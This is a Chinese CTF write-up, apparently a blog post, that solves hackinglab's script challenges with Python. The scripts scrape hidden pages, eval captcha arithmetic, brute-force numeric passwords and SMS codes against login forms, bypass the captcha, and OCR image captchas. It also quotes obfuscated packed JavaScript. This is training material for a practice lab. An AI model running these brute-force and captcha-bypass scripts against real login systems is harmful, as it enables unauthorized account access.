WP-hackinglab 脚本关(py脚本)

key又又找不到了

点击_到这里找key__后跳转到了没有key的页面,明显的跳转

抓下来./search_key.php这个页面就好

1
2
3
4
5
6
import requests

ssion = requests.Session()
url = "http://lab1.xseclab.com/xss1_30ac8668cd453e7e387c76b132b140bb/search_key.php"
r = ssion.post(url).content.decode('utf-8')
print(r)

快速口算

明显的脚本题,直接抓下来然后计算式子就好
用到了正则

1
2
3
4
5
6
7
8
9
10
import re
import requests

ssion = requests.Session()
url = 'http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php'
head = {'cookie': 'PHPSESSID=e26ab2950d310b1bd6761d85d5ed8353'}
r = ssion.post(url,headers=head).content.decode('utf-8')
findtext = re.findall('<br/>\s+(.*?)=', r)
data = {'v': eval(findtext[0])}
print(ssion.post(url, data=data, headers=head).content.decode('utf-8'))

这个题目是空的

回答空即可,那就是null

怎么就是不弹出key呢?

源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<script>

function alert(a){
return false;
}
document.write=function(){
return false;
}
function prompt(a){
return false;
}
var a=function (){
var b=function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1s(1e(p,a,c,k,e,r){e=1e(c){1d(c<a?\'\':e(1p(c/a)))+((c=c%a)>1q?1f.1j(c+1k):c.1n(1o))};1g(!\'\'.1h(/^/,1f)){1i(c--)r[e(c)]=k[c]||e(c);k=[1e(e){1d r[e]}];e=1e(){1d\'\\\\w+\'};c=1};1i(c--)1g(k[c])p=p.1h(1l 1m(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);1d p}(\'Y(R(p,a,c,k,e,r){e=R(c){S(c<a?\\\'\\\':e(18(c/a)))+((c=c%a)>17?T.16(c+15):c.12(13))};U(!\\\'\\\'.V(/^/,T)){W(c--)r[e(c)]=k[c]||e(c);k=[R(e){S r[e]}];e=R(){S\\\'\\\\\\\\w+\\\'};c=1};W(c--)U(k[c])p=p.V(Z 11(\\\'\\\\\\\\b\\\'+e(c)+\\\'\\\\\\\\b\\\',\\\'g\\\'),k[c]);S p}(\\\'G(B(p,a,c,k,e,r){e=B(c){A c.L(a)};E(!\\\\\\\'\\\\\\\'.C(/^/,F)){D(c--)r[e(c)]=k[c]||e(c);k=[B(e){A r[e]}];e=B(){A\\\\\\\'\\\\\\\\\\\\\\\\w+\\\\\\\'};c=1};D(c--)E(k[c])p=p.C(I J(\\\\\\\'\\\\\\\\\\\\\\\\b\\\\\\\'+e(c)+\\\\\\\'\\\\\\\\\\\\\\\\b\\\\\\\',\\\\\\\'g\\\\\\\'),k[c]);A p}(\\\\\\\'t(h(p,a,c,k,e,r){e=o;n(!\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\'.m(/^/,o)){l(c--)r[c]=k[c]||c;k=[h(e){f r[e]}];e=h(){f\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\w+\\\\\\\\\\\\\\\'};c=1};l(c--)n(k[c])p=p.m(q s(\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\b\\\\\\\\\\\\\\\'+e(c)+\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\b\\\\\\\\\\\\\\\',\\\\\\\\\\\\\\\'g\\\\\\\\\\\\\\\'),k[c]);f p}(\\\\\\\\\\\\\\\'1 3="6";1 4="7";1 5="";8(1 2=0;2<9;2++){5+=3+4}\\\\\\\\\\\\\\\',j,j,\\\\\\\\\\\\\\\'|u|i|b|c|d|v|x|y|j\\\\\\\\\\\\\\\'.z(\\\\\\\\\\\\\\\'|\\\\\\\\\\\\\\\'),0,{}))\\\\\\\',H,H,\\\\\\\'|||||||||||||||A||B||M||D|C|E|F||I||J|G|N|O||P|Q|K\\\\\\\'.K(\\\\\\\'|\\\\\\\'),0,{}))\\\',X,X,\\\'||||||||||||||||||||||||||||||||||||S|R|V|W|U|T|Y|13|Z|11|14|12|10|19|1a|1b|1c\\\'.14(\\\'|\\\'),0,{}))\',1t,1u,\'|||||||||||||||||||||||||||||||||||||||||||||||||||||1e|1d|1f|1g|1h|1i|1v|1s|1l||1m|1n|1o|1r|1k|1j|1q|1p|1w|1x|1y|1z\'.1r(\'|\'),0,{}))',62,98,'|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||return|function|String|if|replace|while|fromCharCode|29|new|RegExp|toString|36|parseInt|35|split|eval|62|75|53|var|slakfj|teslkjsdflk|for'.split('|'),0,{});
var d=eval(b);
alert("key is first 14 chars"+d);
}
</script>
<a href="javascript:a();">_点击之后怎么没反应呢?说好的弹窗呢?__</a>

把这几个函数去掉本地上运行下即可

1
2
3
4
5
6
7
8
9
function alert(a){
return false;
}
document.write=function(){
return false;
}
function prompt(a){
return false;
}

逗比验证码第一期

脚本爆破密码(这里验证码有无都可):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import requests

count = 0
ssion = requests.Session()
url = "http://lab1.xseclab.com//vcode3_9d1ea7ad52ad93c04a837e0808b17097/login.php"
head = {'cookie': 'PHPSESSID=cd1c5f7554400cd3978f48d6e5c44c6a'}
for num in range(1000, 10000):
count += 1
data = {'username': 'admin', 'pwd': num, 'vcode': '', 'submit': 'submit'}
r = ssion.post(url, data = data, headers = head).content.decode('utf-8')
if 'pwd error' in r:
print("[%d]\033[1;31mpwd: error %d\033[0m" % (count, num))
if 'vcode error' in r:
print('[%d]\033[1;31mvcode error pwd:%d\033[0m' % (count, num))
if 'error' not in r:
print('[%d]\033[1;32mpassword is: %d\033[0m' % (count, num))
print(r)
exit(0)

逗比验证码第二期

一样的脚本爆破(这里不要填验证码):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import requests

ssion = requests.Session()
url = 'http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/login.php'
head = {'cookie': 'PHPSESSID=e26ab2950d310b1bd6761d85d5ed8353'}
for num in range(1000, 10000):
data = {'username': 'admin', 'pwd': num, 'vcode': '', 'submit': 'submit'}
r = ssion.post(url, data=data, headers=head).content.decode('utf-8')
if u'error' in r:
print('\r\033[1;31m[-]I\'m trying!!! PROGESS:%d\033[0m' % num, end="")
if u'error' not in r:
print('\n\033[1;32m[+]Find password! %d\033[0m' % num)
print('\033[1;36m', r, '\033[0m')
exit(0)

逗比的验证码第三期(SESSION)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import requests

ssion = requests.Session()
url = 'http://lab1.xseclab.com/vcode3_9d1ea7ad52ad93c04a837e0808b17097/login.php'
head = {'cookie': 'PHPSESSID=e26ab2950d310b1bd6761d85d5ed8353'}
for num in range(1000, 10000):
data = {'username': 'admin', 'pwd': num, 'vcode': '', 'submit': 'submit'}
r = ssion.post(url, data=data, headers=head).content.decode('utf-8')
if u'error' in r:
print('\r\033[1;31m[-]I\'m trying!!! PROGESS:%d\033[0m' % num, end="")
if u'error' not in r:
print('\n\033[1;32m[+]Find password! %d\033[0m' % num)
print('\033[1;36m', r, '\033[0m')
exit(0)

逗比的手机验证码

获取验证码后提交,发现需要以13388886667提交,
那么:获取验证码,提交,bp抓到,改手机号,提交即可

基情燃烧的岁月

先爆破验证码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import requests

ssion = requests.Session()
url = 'http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/login.php'
head = {'cookie': 'PHPSESSID=e26ab2950d310b1bd6761d85d5ed8353'}
for num in range(100, 1000):
data = {'username': '13388886666', 'vcode': num, 'Login': 'submit'}
r = ssion.post(url, data=data, headers=head).content.decode('utf-8')
if u'error' in r:
print('\r\033[1;31m[-]I\'m trying!!! PROGESS:%d\033[0m' % num, end="")
if u'error' not in r:
print('\n\033[1;32m[+]Find vcode! %d\033[0m' % num)
print('\033[1;36m', r, '\033[0m')
exit(0)


换手机号13399999999继续爆破:

验证码识别

查看源码以及提示中可以看到,验证码是三位数100-999
查看源码,分析js脚本可得知,每次提交需要点击获取验证码
脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import requests
import pytesseract

url = 'http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/login.php'
urlmobi = 'http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/mobi_vcode.php'
imageurl = 'http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/vcode.php'

for num in range(100, 1000):
s = requests.Session()
r = s.post(urlmobi, data={'getcode': '1', 'mobi': '13388886666'})
r = s.get(imageurl)
with open('1.png', 'wb') as f:
for i in r.iter_content(chunk_size=1024):
if i:
f.write(i)
text = pytesseract.image_to_string('1.png').replace(' ', '')
data = {'username': '13388886666', 'mobi_code': num, 'user_code': text, 'Login': 'submit'}
result = s.post(url, data=data).content.decode('utf-8')
print(num, text, result)
if 'error' not in result:
exit()

pytesseract识别验证码会有误差,多试几次即可
也可使用tesserocr

AbelChe wechat
扫码加微信
Donate here!!!
0%